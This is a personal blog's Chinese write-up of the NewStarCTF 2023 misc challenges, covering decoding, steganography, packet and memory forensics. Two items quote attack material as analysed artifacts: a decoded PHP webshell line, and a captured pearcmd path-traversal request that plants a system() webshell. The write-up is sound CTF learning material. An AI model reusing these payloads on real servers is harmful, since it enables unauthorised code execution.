<!DOCTYPE html>
<html lang="zh">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="amino">





<title>BUU NewStarCTF 2023 | 《普通生物学》第四版2.5.2</title>



    <link rel="icon" href="/logo1.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="《普通生物学》第四版2.5.2" type="application/atom+xml">
</head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">《普通生物学》第四版2.5.2</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">《普通生物学》第四版2.5.2</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">BUU NewStarCTF 2023</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">amino</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">August 22, 2024&nbsp;&nbsp;7:50:05</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="BUU-NewStarCTF-2023-Misc"><a href="#BUU-NewStarCTF-2023-Misc" class="headerlink" title="BUU NewStarCTF 2023 Misc"></a>BUU NewStarCTF 2023 Misc</h1><h2 id="WEEK1"><a href="#WEEK1" class="headerlink" title="WEEK1"></a>WEEK1</h2><h3 id="CyberChef’s-Secret"><a href="#CyberChef’s-Secret" class="headerlink" title="CyberChef’s Secret"></a>CyberChef’s Secret</h3><p><em>来签到吧！下面这个就是flag，不过它看起来好像怪怪的:-)</em><br><em>M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA&#x3D;</em><br>BASE32编码，解码得到：<br><em>gprRdQCoa6VMNpWA1K1rjW7dWBgadzFcSrixdcX69YxLeKn8L</em></p>
<p>BASE58编码，解码得到：<br><em>ZmxhZ3tCYXNlXzE1X1MwX0Vhc3lfXl9efQ&#x3D;&#x3D;</em><br>BASE64编码，解码得到：<br><em>flag{Base_15_S0_Easy^^}</em>  </p>
<h3 id="机密图片"><a href="#机密图片" class="headerlink" title="机密图片"></a>机密图片</h3><p>一张二维码，扫码没有flag，010看不出来问题，考虑LSB隐写。stegsolve打开拿到flag</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w1-1.png" alt="w1-1"></p>
<p><em>flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}</em></p>
<h3 id="流量！鲨鱼！"><a href="#流量！鲨鱼！" class="headerlink" title="流量！鲨鱼！"></a>流量！鲨鱼！</h3><p>wireshark打开，导出HTTP，发现在一堆flag和形似的文件里有一个很可疑的*.ffffllllllll11111144444GGGGGG%7cbase64*文件，用记事本打开，里面是base64编码</p>
<p><em>Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo&#x3D;</em></p>
<p>解码两次拿到flag<br><em>flag{Wri35h4rk_1s_u53ful_b72a609537e6}</em></p>
<h3 id="压缩包们"><a href="#压缩包们" class="headerlink" title="压缩包们"></a>压缩包们</h3><p>010打开，头文件被修改的zip文件，还有base64编码的提示：</p>
<p><em>SSBsaWtlIHNpeC1kaWdpdCBudW1iZXJzIGJlY2F1c2UgdGhleSBhcmUgdmVyeSBjb25jaXNlIGFuZCBlYXN5IHRvIHJlbWVtYmVyLg&#x3D;&#x3D;</em></p>
<p>解码得到</p>
<p><em>I like six-digit numbers because they are very concise and easy to remember.</em></p>
<p>头文件改为504B0304，后缀添加.zip，解压一层后内层有加密，但目录区(504B0102)全局方式位标记显示无加密，把00改成09</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w1-2.png" alt="w1-2"></p>
<p>六位数暴力破解，拿到密码232311</p>
<p><em>flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}</em></p>
<h3 id="空白格"><a href="#空白格" class="headerlink" title="空白格"></a>空白格</h3><p>用这个在线工具解密<a target="_blank" rel="noopener" href="https://vii5ard.github.io/whitespace/">Whitelips the Esoteric Language IDE</a>，拿到flag</p>
<p><em>flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}</em></p>
<p>上次做的时候好像把空格一键替换成0，tab一键替换成1，然后二进制转换文本</p>
<details class="lake-collapse"><summary id="u1ce79ea4"><span class="ne-text">二进制</span></summary><p id="ud97ef9bd" class="ne-p" style="margin: 0; padding: 0; min-height: 24px"><span class="ne-text">0001100110 000001101100 000001100001 000001100111 000001111011 000001110111 00000110011 000001011111 000001101000 00000110100 000001110110 00000110011 000001011111 000001110100 000001101111 00000110000 000001011111 000001101101 00000110100 000001101110 000001111001 000001011111 000001110111 000001101000 00000110001 000001110100 00000110011 000001011111 000001110011 000001110000 00000110100 000001100011 000001100101 000001011111 00000110010 000001100001 00000110101 000001100010 00000110100 000001100101 00000110000 00000110100 000001111101</span></p></details>

<h3 id="隐秘的眼睛"><a href="#隐秘的眼睛" class="headerlink" title="隐秘的眼睛"></a>隐秘的眼睛</h3><p>silenteye</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w1-3.png" alt="w1-3"></p>
<p><em>flag{R0ck1ng_y0u_63b0dc13a591}</em></p>
<h2 id="WEEK2"><a href="#WEEK2" class="headerlink" title="WEEK2"></a>WEEK2</h2><h3 id="新建Word文档"><a href="#新建Word文档" class="headerlink" title="新建Word文档"></a>新建Word文档</h3><p><em>新佛曰：毘諸隸僧降吽諸陀摩隸僧缽薩願毘耨咤陀願羅咤喃修願宣亦宣寂叻寂阿是吽阿塞尊劫毘般毘所聞降毘咒塞尊薩咒毘所若降般斯毘嚴毘嚴波斯迦毘色毘波嚴毘喃念若修嘚般毘我毘如毘如囑囑</em></p>
<p>一眼新与佛论禅</p>
<p>默认开着显示隐藏段落标记直接跳步了，右键字体取消隐藏文字的勾选复制</p>
<p>在这里解密<a target="_blank" rel="noopener" href="http://hi.pcmoe.net/Buddha.html">新约佛论禅&#x2F;佛曰加密 - 萌研社 - PcMoe!</a></p>
<p>拿到<em>flag{Th1s_F0_1s_s00_Cyp3r_495586e3df3a}</em></p>
<h3 id="永不消逝的电波"><a href="#永不消逝的电波" class="headerlink" title="永不消逝的电波"></a>永不消逝的电波</h3><p>去年AU看图手敲，今年搞到妙妙工具一键转换<a target="_blank" rel="noopener" href="https://morsecode.world/international/decoder/audio-decoder-adaptive.html">Morse Code Adaptive Audio Decoder</a>添加{}转换小写拿到<em>flag{thebestctferisyou}</em></p>
<h3 id="1-序章"><a href="#1-序章" class="headerlink" title="1-序章"></a>1-序章</h3><p>记事本打开log发现有些时间间隔很长，间隔后的ASCII码从40开始，查找“&#x3D;40”，记录上一条的ASCII码</p>
<p>121，111，117，95，119，52，110，116，95，115，51，99，114，101，116，102，108，97，103，123，106，117，115，116，95，119，52，114，109，95，117，112，95，115，48，95，121，111，117，95，110，51，101，100，95，104，52，114，100，101，114，95，54，48，50，54，99，100，51，50，125</p>
<p>转换为字符：</p>
<p> <em>flag{just_w4rm_up_s0_you_n3ed_h4rder_6026cd32}</em>  </p>
<h3 id="base！"><a href="#base！" class="headerlink" title="base！"></a>base！</h3><p>base64隐写，我是超级脚本小子，又抄到一个</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"> </span><br><span class="line">base64chars=string.ascii_uppercase+string.ascii_lowercase+string.digits+<span class="string">&quot;+/&quot;</span></span><br><span class="line">bins=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getSecret</span>(<span class="params">s</span>):</span><br><span class="line">    <span class="keyword">global</span> bins</span><br><span class="line">    six_bin=<span class="string">&quot;&quot;</span></span><br><span class="line">    countZero=<span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> item <span class="keyword">in</span> s:</span><br><span class="line">        <span class="keyword">if</span> item==<span class="string">&quot;=&quot;</span>:</span><br><span class="line">            countZero+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            six_bin += <span class="built_in">bin</span>(<span class="built_in">int</span>(base64chars.index(item)))[<span class="number">2</span>:].zfill(<span class="number">6</span>)</span><br><span class="line">    bins+=six_bin[-(countZero*<span class="number">2</span>):]</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;flag.txt&quot;</span>,<span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    lines=f.readlines()</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">        line=line.strip()</span><br><span class="line">        <span class="keyword">if</span> line.count(<span class="string">&quot;=&quot;</span>):</span><br><span class="line">            getSecret(line)</span><br><span class="line">    s=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(bins),<span class="number">8</span>):</span><br><span class="line">        s+=<span class="built_in">chr</span>(<span class="built_in">int</span>(bins[i:i+<span class="number">8</span>],<span class="number">2</span>))</span><br><span class="line">    <span class="built_in">print</span>(s)</span><br></pre></td></tr></table></figure>

<p>拿到一串<em>iDMb6ZMnTFMtFuouYZHwPTYAoWjC7Hjca8</em></p>
<p>base58解码<em>flag{b4se_1s_4_g0od_c0d3}</em></p>
<h3 id="WebShell的利用"><a href="#WebShell的利用" class="headerlink" title="WebShell的利用"></a>WebShell的利用</h3><p>先解码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&quot;eval(str_rot13(convert_uudecode(str_rot13(base64_decode(&#x27;略&#x27;)))));&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">decodephp</span>(<span class="params"><span class="variable">$a</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$max_level</span> = <span class="number">300</span>; <span class="comment">//最大层数</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$max_level</span>; <span class="variable">$i</span>++) </span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title function_ invoke__">ob_start</span>();</span><br><span class="line">        <span class="keyword">eval</span>(<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;eval&#x27;</span>, <span class="string">&#x27;echo&#x27;</span>, <span class="variable">$a</span>));</span><br><span class="line">        <span class="variable">$a</span> = <span class="title function_ invoke__">ob_get_clean</span>();</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$a</span>, <span class="string">&#x27;eval(str_rot13(convert_uudecode(str_rot13(base64_decode&#x27;</span>) === <span class="literal">false</span>) </span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable">$a</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">decodephp</span>(<span class="variable">$a</span>);</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p>error_reporting(0);($_GET[‘7d67973a’])($_POST[‘9fa3’]);</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w2-1.png" alt="w2-1"></p>
<p> <em>flag{a56f56f7-a5d2-45ce-acc6-da1032a9b08f}</em>  </p>
<h3 id="Jvav"><a href="#Jvav" class="headerlink" title="Jvav"></a>Jvav</h3><p>java盲水印，妙妙工具<a target="_blank" rel="noopener" href="https://github.com/ww23/BlindWatermark">https://github.com/ww23/BlindWatermark</a></p>
<p>java -jar BlindWatermark.jar decode -c challenge.png output.png</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w2-2.png" alt="w2-2"></p>
<p><em>flag{3bb3c3a628a94c}</em></p>
<h2 id="WEEK3"><a href="#WEEK3" class="headerlink" title="WEEK3"></a>WEEK3</h2><h3 id="阳光开朗大男孩"><a href="#阳光开朗大男孩" class="headerlink" title="阳光开朗大男孩"></a>阳光开朗大男孩</h3><p>flag.txt里是表情，secret.txt里是核心价值观编码</p>
<p><em>法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由</em></p>
<p>解码拿到<em>this_password_is_s000_h4rd_p4sssw0rdddd</em></p>
<p>既然有密码那就不是base100，是emoji-aes，key是<em>s000_h4rd_p4sssw0rdddd</em>，解密得到<em>flag{3m0ji_1s_s0000_1nt3rest1ng_0861aada1050}</em></p>
<h3 id="大怨种"><a href="#大怨种" class="headerlink" title="大怨种"></a>大怨种</h3><p>gif逐帧查看，中间是汉信码，保存不知道为什么变色扫不出来，调成黑白或者直接截图识别</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-1.png" alt="w3-1"></p>
<p><em>flag{1_d0nt_k0nw_h0w_to_sc4n_th1s_c0d3_acef808a868e}</em></p>
<h3 id="2-分析"><a href="#2-分析" class="headerlink" title="2-分析"></a>2-分析</h3><p>全导出来D盾扫了一遍（是这么做的吗？）</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-2.png" alt="w3-2"></p>
<p>找到这个文件对应的序号1267，里面写*[Request in frame: 1209]*</p>
<p>跳转到1209</p>
<p><em>GET &#x2F;index.php?page&#x3D;&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd&amp;+config-create+&#x2F;&amp;<?=system($_GET['a'])?>+&#x2F;var&#x2F;www&#x2F;html&#x2F;wh1t3g0d.php HTTP&#x2F;1.1\r\n</em></p>
<p>是这么做的吗？？</p>
<p>字符串搜索username</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-3.png" alt="w3-3"></p>
<p><em>Value: best_admin</em></p>
<p>所以是<em>best_admin_index.php_wh1t3g0d.php</em></p>
<p>md5小写32位<em>flag{4069afd7089f7363198d899385ad688b}</em></p>
<p>是这么做的吗？？？</p>
<h3 id="键盘侠"><a href="#键盘侠" class="headerlink" title="键盘侠"></a>键盘侠</h3><p>USB键盘流量，又抄到脚本了<a target="_blank" rel="noopener" href="https://github.com/P001water/UsbKbCracker">GitHub - P001water&#x2F;UsbKbCracker: CTF中常见键盘流量解密脚本</a></p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-4.png" alt="w3-4"></p>
<p>转换成小写 flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}</p>
<h3 id="滴滴滴"><a href="#滴滴滴" class="headerlink" title="滴滴滴"></a>滴滴滴</h3><p>奇怪的音频.wav是拨号音，用dtmf2num.exe识别拿到<em>52563319066</em></p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-5.png" alt="w3-5"></p>
<p>用steghide提取得到</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w3-6.png" alt="w3-6"></p>
<p><em>flag{1nf0rm4t10n_s3cur1ty_1s_a_g00d_j0b_94e0308b}</em></p>
<h2 id="WEEK4"><a href="#WEEK4" class="headerlink" title="WEEK4"></a>WEEK4</h2><h3 id="R通大残"><a href="#R通大残" class="headerlink" title="R通大残"></a>R通大残</h3><p>stegsolve打开，发现RED都有东西，勾上，拿到flag</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-1.png" alt="w4-1"></p>
<p><em>flag{a96d2cc1-6edd-47fb-8e84-bd953205c9f5}</em></p>
<h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><p>分组详情-字符串 搜索 <em>[SYN, ACK]</em> ，得到开放端口</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-2.png" alt="w4-2"></p>
<p>排序 <em>flag{80,3306,5000,7000,8021,9000}</em></p>
<h3 id="依旧是空白"><a href="#依旧是空白" class="headerlink" title="依旧是空白"></a>依旧是空白</h3><p>修改宽高，拿到密钥，<em>s00_b4by_f0r_y0r</em></p>
<p>有密钥的空白字符加密 snow</p>
<p>snow -p s00_b4by_f0r_y0u -C C:\Users\amino\Desktop\0\misc\yjskb\White.txt &gt; output.txt</p>
<p><em>flag{2b29e3e0-5f44-402b-8ab3-35548d7a6a11}</em></p>
<h3 id="3-溯源"><a href="#3-溯源" class="headerlink" title="3-溯源"></a>3-溯源</h3><p>搜索2-分析获得的后门文件</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-2.5.png" alt="w4-2.5"></p>
<p>BASE64解码拿到密钥</p>
<p>key&#x3D;”e45e329feb5d925b”</p>
<p>然后呢</p>
<h3 id="第一次取证"><a href="#第一次取证" class="headerlink" title="第一次取证"></a>第一次取证</h3><p>我讨厌你们这群用百度网盘传题目的</p>
<p>.raw 内存镜像文件</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\dycqz.raw imageinfo</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-3.png" alt="w4-3"></p>
<p>可能是Win7SP1x64的镜像</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\dycqz.raw –profile&#x3D;Win7SP1x64 filescan | findstr “flag”</p>
<p>筛选含flag的文件，没有</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\dycqz.raw –profile Win7SP1x64 pslist</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-4.png" alt="w4-4"></p>
<p>打印进程，cmd和notepad两个很可疑</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\dycqz.raw –profile Win7SP1x64 cmdscan</p>
<p>查看cmd操作，但是没东西</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\dycqz.raw –profile Win7SP1x64 editbox</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w4-5.png" alt="w4-5"></p>
<p>查看notepad（win7需要使用editbox），得到一串字符*@iH&lt;,{BTrI;(N[&#96;j&amp;z+xcj9XE2!u&#x2F;YbR:4gb2+ceDJs@u6P*</p>
<p>base91解码得到<em>flag{a308067fc26625d31a421247adce3893}</em></p>
<h2 id="WEEK5"><a href="#WEEK5" class="headerlink" title="WEEK5"></a>WEEK5</h2><h3 id="隐秘的图片"><a href="#隐秘的图片" class="headerlink" title="隐秘的图片"></a>隐秘的图片</h3><p>stegsolve打开key1，使用image combiner选择key2</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w5-1.png" alt="w5-1"></p>
<p>扫描</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w5-2.png" alt="w5-2"></p>
<p><em>flag{x0r_1m4ge_w1ll_g0t_fl4ggg_3394e4ecbb53}</em></p>
<h3 id="ezhard"><a href="#ezhard" class="headerlink" title="ezhard"></a>ezhard</h3><p>7z打开文件</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w5-3.png" alt="w5-3"></p>
<p>hint图片</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w5-4.png" alt="w5-4"></p>
<p><em>flag{12bc2ba3-fa54-7b45-7f3d-f54ea6e45d7c}</em></p>
<h3 id="新建python文件"><a href="#新建python文件" class="headerlink" title="新建python文件"></a>新建python文件</h3><p>pyc隐写</p>
<p><img src="/2024-08-22-BUU-NewStarCTF-2023/w5-5.png" alt="w5-5"></p>
<p><em>flag{s0_b4By_pYcst3g}</em></p>
<h3 id="BabyAntSword"><a href="#BabyAntSword" class="headerlink" title="BabyAntSword"></a>BabyAntSword</h3><p>没做</p>
<h3 id="Easymem"><a href="#Easymem" class="headerlink" title="Easymem"></a>Easymem</h3><p>又是raw文件，volatility看看</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\WIN-DOOJTVIN21M-20231005-091206.raw imageinfo</p>
<p>还是Win7SP1x64</p>
<p>筛选一下含flag的文件</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\WIN-DOOJTVIN21M-20231005-091206.raw –profile&#x3D;Win7SP1x64 filescan | findstr “flag”</p>
<p>有个flag2，dumpfiles提取</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\WIN-DOOJTVIN21M-20231005-091206.raw –profile&#x3D;Win7SP1x64 dumpfiles -Q 0x7ed627e0 –dump-dir&#x3D;.&#x2F;</p>
<p>最后面不能乱加空格，不然报错。notepad++打开，拿到一串数字<em>83-5032-1056-</em></p>
<p>看起来还有下文</p>
<p>扫描进程，有cmd</p>
<p>volatility.exe -f C:\Users\amino\Desktop\0\misc\WIN-DOOJTVIN21M-20231005-091206.raw –profile&#x3D;Win7SP1x64 consoles</p>
<p>查看输入与输出，downloads后面有个4C60-4FE4不知道有没有用，先记下</p>
<p>装不上mimikatz不做了</p>

        </div>

        
            <section class="post-copyright">
                
                
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/misc/"># misc</a>
                    
                        <a href="/tags/CTF/"># CTF</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2024-08-20-C6H12O6/">C6H12O6</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© amino | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>